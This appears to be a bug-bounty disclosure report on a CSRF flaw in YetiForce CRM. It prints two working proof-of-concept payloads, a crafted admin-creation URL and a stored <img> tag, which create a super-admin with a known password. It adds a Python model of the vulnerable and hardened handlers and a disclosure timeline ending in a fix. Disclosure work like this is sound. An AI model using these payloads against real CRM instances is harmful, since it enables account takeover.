Cross-Site Request Forgery (CSRF) in yetiforcecompany/yetiforcecrm

Valid

Reported on Jan 12th 2022


Description

Hi there, I would like to report a CSRF vulnerability in yetiforcecompany/yetiforcecrm. It allows an attacker to create a new admin. Even when SameSite=Strict is enabled, this can still be exploited by an attacker with the lowest-privilege account (e.g. guest).

Proof of Concept

  • These are PoCs for 2 scenarios; both lead to the creation of a new admin with username testggwp and password Admin@123.

  • Scenario 1: SameSite is None or Lax

  • Trick the admin into accessing the link below:

/index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&picklistDependency=%5b%5d&mappingRelatedField=%5b%5d&listFilterFields=%5b%5d&defaultOtherEventDuration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a%2260%22%7d%5d&user_name=testggwp&is_admin=1&first_name=testggwp&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123&confirm_password=Admin@123&super_user=1&email1=testggwp@user.com&secondary_email=&primary_phone_country=AF&primary_phone=&primary_phone_extra=&phone_crm_extension_country=AF&phone_crm_extension=&phone_crm_extension_extra=&emailoptout=0&date_format=dd-mm-yyyy&hour_format=24&time_zone=Asia%2fBangkok&dayoftheweek=Monday&activity_view=This+Month&defaultactivitytype=Meeting&defaulteventstatus=PLL_PLANNED&view_date_format=PLL_ELAPSED&reminder_interval=15+Minutes&othereventduration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a60%7d%5d&activitytype=Call&duration=60&activitytype=Meeting&duration=60&activitytype=Task&duration=60&currency_id=1&currency_decimal_separator=.&currency_symbol_placement=1.0%24&truncate_trailing_zeros=0&currency_grouping_pattern=123%2c456%2c789&currency_grouping_separator=+&no_of_currency_decimals=2&start_hour=08%3a00&end_hour=16%3a00&language=&rowheight=medium&leftpanelhide=0&default_record_view=Summary&theme=twilight&imagename=%5b%5d&login_method=PLL_PASSWORD&internal_mailer=0&sync_carddav=PLL_OWNER&sync_caldav=PLL_OWNER&sync_carddav_default_country=&default_search_module=&default_search_override=0&default_search_operator=PLL_CONTAINS&available=0&auto_assign=0&records_limit=0&description=&popupReferenceModule=Users&reports_to_id=0&reports_to_id_display=&isPreference=&timeFormatOptions=
  • Scenario 2: SameSite is Strict

  • Create a record in Documents with the payload below in the description (click Source, then paste). After that, trick the admin into visiting the record.

<img src="/index.php?module=Users&parent=Settings&view=Edit&fromView=Create&action=Save&picklistDependency=%5b%5d&mappingRelatedField=%5b%5d&listFilterFields=%5b%5d&defaultOtherEventDuration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a%2260%22%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a%2260%22%7d%5d&user_name=testggwp&is_admin=1&first_name=testggwp&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123&confirm_password=Admin@123&super_user=1&email1=testggwp@user.com&secondary_email=&primary_phone_country=AF&primary_phone=&primary_phone_extra=&phone_crm_extension_country=AF&phone_crm_extension=&phone_crm_extension_extra=&emailoptout=0&date_format=dd-mm-yyyy&hour_format=24&time_zone=Asia%2fBangkok&dayoftheweek=Monday&activity_view=This+Month&defaultactivitytype=Meeting&defaulteventstatus=PLL_PLANNED&view_date_format=PLL_ELAPSED&reminder_interval=15+Minutes&othereventduration=%5b%7b%22activitytype%22%3a%22Call%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Meeting%22%2c%22duration%22%3a60%7d%2c%7b%22activitytype%22%3a%22Task%22%2c%22duration%22%3a60%7d%5d&activitytype=Call&duration=60&activitytype=Meeting&duration=60&activitytype=Task&duration=60&currency_id=1&currency_decimal_separator=.&currency_symbol_placement=1.0%24&truncate_trailing_zeros=0&currency_grouping_pattern=123%2c456%2c789&currency_grouping_separator=+&no_of_currency_decimals=2&start_hour=08%3a00&end_hour=16%3a00&language=&rowheight=medium&leftpanelhide=0&default_record_view=Summary&theme=twilight&imagename=%5b%5d&login_method=PLL_PASSWORD&internal_mailer=0&sync_carddav=PLL_OWNER&sync_caldav=PLL_OWNER&sync_carddav_default_country=&default_search_module=&default_search_override=0&default_search_operator=PLL_CONTAINS&available=0&auto_assign=0&records_limit=0&description=&popupReferenceModule=Users&reports_to_id=0&reports_to_id_display=&isPreference=&timeFormatOptions="> 

Impact

After the CSRF payload is triggered, the attacker can become an admin with full privileges.
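The two scenarios above, as an added example that is not part of the report or of YetiForce's code: a hypothetical "Save" handler that mirrors the described pre-fix behaviour (any authenticated admin request with action=Save creates the user, via GET, with no token), a small model of when a browser attaches a SameSite cookie, and the hardened handler that refuses both PoCs while still accepting the real form. The PoC query string is reduced to the parameters that matter; all other names (Request, SESSIONS, users_after, forged_request, the sample session id) are assumptions.

```python
# Added example, not code from YetiForce CRM. Models the two PoC scenarios
# from the report against a hypothetical "Save" handler, then shows the
# check that defeats both. All names below are assumptions.
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit, parse_qs

# Parameters of the PoC URL from the report that decide the outcome
# (the remaining preference fields are omitted here).
POC_URL = ("/index.php?module=Users&parent=Settings&view=Edit&fromView=Create"
           "&action=Save&user_name=testggwp&is_admin=1&first_name=testggwp"
           "&last_name=testggwp&roleid=H14&status=Active&user_password=Admin@123"
           "&confirm_password=Admin@123&super_user=1&email1=testggwp@user.com")


@dataclass
class Request:
    method: str
    path: str
    params: dict            # query string (GET) or body (POST), flattened
    cookies: dict
    headers: dict = field(default_factory=dict)


def browser_attaches_cookie(samesite, cross_site, top_level_navigation):
    """Model of the SameSite attribute: does the browser send the session cookie?"""
    if not cross_site:
        return True                  # same-site request: SameSite never applies
    if samesite == "None":
        return True
    if samesite == "Lax":
        return top_level_navigation  # a clicked link carries it, a cross-site <img> does not
    return False                     # Strict: no cross-site request carries it


SESSION_COOKIE = "s3ss10n"   # constructed sample session id
SESSIONS = {SESSION_COOKIE: {"user": "admin", "is_admin": True,
                             "csrf_token": secrets.token_hex(16)}}


def users_after(handler, req):
    """Run handler against a fresh user table; return (status, users created)."""
    users = {}
    status = handler(req, users)
    return status, users


def vulnerable_save(req, users):
    """Pre-fix behaviour as the report describes it: an authenticated admin
    request with action=Save creates the user, whatever the method or origin."""
    sess = SESSIONS.get(req.cookies.get("session"))
    if not sess or not sess["is_admin"]:
        return 403
    if req.params.get("action") != "Save":
        return 404
    users[req.params["user_name"]] = {"is_admin": req.params.get("is_admin") == "1",
                                      "super_user": req.params.get("super_user") == "1"}
    return 200


def hardened_save(req, users):
    """Same action with CSRF defences: state changes only via POST, and a
    per-session token carried in the body (never in the URL) must match."""
    sess = SESSIONS.get(req.cookies.get("session"))
    if not sess or not sess["is_admin"]:
        return 403
    if req.method != "POST":
        return 405
    token = req.params.get("csrf_token", "")
    if not hmac.compare_digest(token, sess["csrf_token"]):
        return 403
    return vulnerable_save(req, users)   # checks passed; perform the create


def forged_request(samesite, cross_site, top_level_navigation, method="GET"):
    """The request a browser emits for the PoC URL under the given conditions."""
    parts = urlsplit(POC_URL)
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    cookies = {}
    if browser_attaches_cookie(samesite, cross_site, top_level_navigation):
        cookies["session"] = SESSION_COOKIE
    return Request(method, parts.path, params, cookies)


# Scenario 1: the admin clicks an attacker link (cross-site, top-level), SameSite=Lax.
scenario1 = forged_request("Lax", cross_site=True, top_level_navigation=True)
# Scenario 2: <img src="/index.php?..."> stored in a Documents record and viewed by
# the admin: the request is same-site, so SameSite=Strict does not apply.
scenario2 = forged_request("Strict", cross_site=False, top_level_navigation=False)
# Legitimate use: the real form POSTs with the token from the admin's own session.
legit = Request("POST", "/index.php",
                {**forged_request("Strict", False, False).params,
                 "csrf_token": SESSIONS[SESSION_COOKIE]["csrf_token"]},
                {"session": SESSION_COOKIE})

if __name__ == "__main__":
    for name, req in [("scenario1", scenario1), ("scenario2", scenario2), ("legit", legit)]:
        print(name, users_after(vulnerable_save, req), users_after(hardened_save, req))
```

The point the model makes explicit: SameSite is a cross-site control only. Scenario 2 never crosses a site boundary, because the payload is stored in the application and loaded from the same origin, so the only defences that hold there are rejecting GET for state-changing actions and requiring a per-session token that the stored `<img>` cannot know. Checking the Origin header is a useful extra layer for cross-site cases but would also pass scenario 2.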

We are processing your report and will contact the yetiforcecompany/yetiforcecrm team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago
We have contacted a member of the yetiforcecompany/yetiforcecrm team and are waiting to hear back 2 years ago
We have sent a follow up to the yetiforcecompany/yetiforcecrm team. We will try again in 7 days. 2 years ago
Radosław (Maintainer), 2 years ago:

Thank you for the report. We're currently working on a fix that will be released soon, and then we'll take care of this report. Thanks.

Radosław Skrzypczak validated this vulnerability 2 years ago
supernaruto16 has been awarded the disclosure bounty
The fix bounty is now up for grabs
Radosław Skrzypczak marked this as fixed in 6.3.0 with commit 298c78 2 years ago
Radosław Skrzypczak has been awarded the fix bounty
This vulnerability will not receive a CVE